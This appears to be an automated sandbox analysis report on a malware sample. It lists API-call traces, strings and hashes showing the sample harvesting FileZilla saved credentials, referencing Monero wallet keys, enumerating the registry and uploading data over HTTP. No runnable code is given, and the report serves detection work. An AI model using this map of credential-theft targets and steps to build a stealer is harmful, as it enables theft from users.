lstrcat.KERNEL32(?,00000000), ref: 008A05E6
lstrcat.KERNEL32(?,008B1688), ref: 008A05F5
lstrcat.KERNEL32(?,password: ), ref: 008A0604
lstrcat.KERNEL32(?,00000000), ref: 008A0617
lstrcat.KERNEL32(?,008B1698), ref: 008A0626
lstrcat.KERNEL32(?,008B169C), ref: 008A0635
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008B0DB2), ref: 008A068E

Strings

<Pass encoding="base64">, xrefs: 008A045A
<Port>, xrefs: 008A03C6
browser: FileZilla, xrefs: 008A0559
password: , xrefs: 008A05FB
login: , xrefs: 008A05CA
profile: null, xrefs: 008A0568
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 008A02A4
<User>, xrefs: 008A0410
url: , xrefs: 008A0577
<Host>, xrefs: 008A037C

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1942843190-555421843
Opcode ID: 7f5b88cb47be8406788ef2433bc6b5fcab1bcf72424f3c79bf8f8c3b674ddaed
Instruction ID: b842a92cacddf555083b10d49b67f4b2678808360290bc22046383cb6654a229
Opcode Fuzzy Hash: 7f5b88cb47be8406788ef2433bc6b5fcab1bcf72424f3c79bf8f8c3b674ddaed
Instruction Fuzzy Hash: 33D12F719001089BDB48EBE4DD96EEE7778FF29300F544519F503E6991EF38AA06CB62

Function 00895100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Part of subcall function 008947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00894839
Part of subcall function 008947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00894849

lstrlen.KERNEL32(00000000), ref: 00895193

Part of subcall function 008A8EA0: CryptBinaryToStringA.CRYPT32(00000000,00895184,40000001,00000000,00000000,?,00895184), ref: 008A8EC0

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00895207
StrCmpCA.SHLWAPI(?,0142E808), ref: 00895225
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00895340
HttpOpenRequestA.WININET(00000000,0142E888,?,0142E1B8,00000000,00000000,00400100,00000000), ref: 008953A4

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,0142E928,00000000,?,0142A7E0,00000000,?,008B19DC,00000000,?,008A51CF), ref: 00895737
lstrlen.KERNEL32(00000000), ref: 0089574B
GetProcessHeap.KERNEL32(00000000,?), ref: 0089575C
RtlAllocateHeap.NTDLL(00000000), ref: 00895763
lstrlen.KERNEL32(00000000), ref: 00895778
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 008957A9
lstrlen.KERNEL32(00000000), ref: 008957C8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 008957E1
lstrlen.KERNEL32(00000000,?,?), ref: 0089580E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00895822
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0089584D
InternetCloseHandle.WININET(00000000), ref: 008958B1
InternetCloseHandle.WININET(00000000), ref: 008958BE
InternetCloseHandle.WININET(00000000), ref: 008958C8

Strings

--, xrefs: 00895280
------, xrefs: 008954F9
", xrefs: 00895706
------, xrefs: 00895297
", xrefs: 008955C4
", xrefs: 00895482
------, xrefs: 0089563B
------, xrefs: 008953B7

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 1224485577-2774362122
Opcode ID: 5c021d6283066037f6a38c773df5d4a98a5d085c03a468ffc2e4193a3752e6e9
Instruction ID: 5d97d4b2abe240c05134f21049e814de23100cf7202d37c5af4a639abc39644f
Opcode Fuzzy Hash: 5c021d6283066037f6a38c773df5d4a98a5d085c03a468ffc2e4193a3752e6e9
Instruction Fuzzy Hash: 64324171920118AAEB58EBA4DC91FEEB378FF15700F404169B117E2991EF342A49CF63

Function 0089A790 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 539
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008AAA70: StrCmpCA.SHLWAPI(014291B8,0089A7A7,?,0089A7A7,014291B8), ref: 008AAA8F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0089AAC8
RtlAllocateHeap.NTDLL(00000000), ref: 0089AACF
StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 0089ABE2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0089A8B0

Part of subcall function 008AA820: lstrlen.KERNEL32(00894F05,?,?,00894F05,008B0DDE), ref: 008AA82B
Part of subcall function 008AA820: lstrcpy.KERNEL32(008B0DDE,00000000), ref: 008AA885

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

lstrcat.KERNEL32(?,00000000), ref: 0089ACEB
lstrcat.KERNEL32(?,008B1320), ref: 0089ACFA
lstrcat.KERNEL32(?,00000000), ref: 0089AD0D
lstrcat.KERNEL32(?,008B1324), ref: 0089AD1C
lstrcat.KERNEL32(?,00000000), ref: 0089AD2F
lstrcat.KERNEL32(?,008B1328), ref: 0089AD3E
lstrcat.KERNEL32(?,00000000), ref: 0089AD51
lstrcat.KERNEL32(?,008B132C), ref: 0089AD60
lstrcat.KERNEL32(?,00000000), ref: 0089AD73
lstrcat.KERNEL32(?,008B1330), ref: 0089AD82
lstrcat.KERNEL32(?,00000000), ref: 0089AD95
lstrcat.KERNEL32(?,008B1334), ref: 0089ADA4
lstrcat.KERNEL32(?,00000000), ref: 0089ADB7
lstrlen.KERNEL32(?), ref: 0089AE0D
lstrlen.KERNEL32(?), ref: 0089AE1C

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

DeleteFileA.KERNEL32(00000000), ref: 0089AE97

Strings

ERROR_RUN_EXTRACTOR, xrefs: 0089ABD4

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcess
String ID: ERROR_RUN_EXTRACTOR
API String ID: 4157063783-2709115261
Opcode ID: 05fb47da1505c2f6efb444e3f94b1ea4e0c3f3af908083f460eaa757199feaf8
Instruction ID: 573e5743083322d0f45fa847f09315ebbf2abf6ee41ce5d22226f9b7ca65f37a
Opcode Fuzzy Hash: 05fb47da1505c2f6efb444e3f94b1ea4e0c3f3af908083f460eaa757199feaf8
Instruction Fuzzy Hash: 4A1231719101089BDB48FBA4DD96EEE7378FF15300F544069B507E6991EF386A0ACBA3

Function 00895960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Part of subcall function 008947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00894839
Part of subcall function 008947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00894849

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008959F8
StrCmpCA.SHLWAPI(?,0142E808), ref: 00895A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00895B93
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0142E8D8,00000000,?,0142A7E0,00000000,?,008B1A1C), ref: 00895E71
lstrlen.KERNEL32(00000000), ref: 00895E82
GetProcessHeap.KERNEL32(00000000,?), ref: 00895E93
RtlAllocateHeap.NTDLL(00000000), ref: 00895E9A
lstrlen.KERNEL32(00000000), ref: 00895EAF
lstrlen.KERNEL32(00000000), ref: 00895ED8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00895EF1
lstrlen.KERNEL32(00000000,?,?), ref: 00895F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00895F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00895F4C
InternetCloseHandle.WININET(00000000), ref: 00895FB0
InternetCloseHandle.WININET(00000000), ref: 00895FBD
HttpOpenRequestA.WININET(00000000,0142E888,?,0142E1B8,00000000,00000000,00400100,00000000), ref: 00895BF8

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

InternetCloseHandle.WININET(00000000), ref: 00895FC7

Strings

", xrefs: 00895CD5
------, xrefs: 00895A96
------, xrefs: 00895C0B
------, xrefs: 00895D4C
", xrefs: 00895E16

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 874700897-2180234286
Opcode ID: 2b6b2b18037e56fc21e975df7a7cdd6f9d62885617b39d698a37e0ea930daa04
Instruction ID: b39eb91690ba500f5eca8d4e3c62628fdc011ffaf330262edb2cabc6c8eb107f
Opcode Fuzzy Hash: 2b6b2b18037e56fc21e975df7a7cdd6f9d62885617b39d698a37e0ea930daa04
Instruction Fuzzy Hash: 92122271820118ABEB59EBA4DC95FEEB378FF15700F444169B107E2991EF342A4ACF52

Function 0089CEF0 Relevance: 30.4, APIs: 20, Instructions: 375
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008A8B60: GetSystemTime.KERNEL32(008B0E1A,0142A240,008B05AE,?,?,008913F9,?,0000001A,008B0E1A,00000000,?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008A8B86

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0089CF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0089D0C7
RtlAllocateHeap.NTDLL(00000000), ref: 0089D0CE
lstrcat.KERNEL32(?,00000000), ref: 0089D208
lstrcat.KERNEL32(?,008B1478), ref: 0089D217
lstrcat.KERNEL32(?,00000000), ref: 0089D22A
lstrcat.KERNEL32(?,008B147C), ref: 0089D239
lstrcat.KERNEL32(?,00000000), ref: 0089D24C
lstrcat.KERNEL32(?,008B1480), ref: 0089D25B
lstrcat.KERNEL32(?,00000000), ref: 0089D26E
lstrcat.KERNEL32(?,008B1484), ref: 0089D27D
lstrcat.KERNEL32(?,00000000), ref: 0089D290
lstrcat.KERNEL32(?,008B1488), ref: 0089D29F
lstrcat.KERNEL32(?,00000000), ref: 0089D2B2
lstrcat.KERNEL32(?,008B148C), ref: 0089D2C1
lstrcat.KERNEL32(?,00000000), ref: 0089D2D4
lstrcat.KERNEL32(?,008B1490), ref: 0089D2E3

Part of subcall function 008AA820: lstrlen.KERNEL32(00894F05,?,?,00894F05,008B0DDE), ref: 008AA82B
Part of subcall function 008AA820: lstrcpy.KERNEL32(008B0DDE,00000000), ref: 008AA885

lstrlen.KERNEL32(?), ref: 0089D32A
lstrlen.KERNEL32(?), ref: 0089D339

Part of subcall function 008AAA70: StrCmpCA.SHLWAPI(014291B8,0089A7A7,?,0089A7A7,014291B8), ref: 008AAA8F

DeleteFileA.KERNEL32(00000000), ref: 0089D3B4

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: a20bb1d9461f2fe7827884b035d62d64f32a75829d1375a2dd6e56c908cab4e2
Instruction ID: c7721b8d029157facc3488185a65077b0efaf0e99e7b2e327979dd958c4dfb38
Opcode Fuzzy Hash: a20bb1d9461f2fe7827884b035d62d64f32a75829d1375a2dd6e56c908cab4e2
Instruction Fuzzy Hash: 14E13D71910108ABDB48EBA4DD96EEE7378FF15301F104169F507E6991DF38AA06CB63

Function 008A8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

RegOpenKeyExA.KERNEL32(00000000,0142B648,00000000,00020019,00000000,008B05B6), ref: 008A83A4
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 008A8426
wsprintfA.USER32 ref: 008A8459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 008A847B
RegCloseKey.ADVAPI32(00000000), ref: 008A848C
RegCloseKey.ADVAPI32(00000000), ref: 008A8499

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Strings

%s\%s, xrefs: 008A844D
- , xrefs: 008A85A3
?, xrefs: 008A837A

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
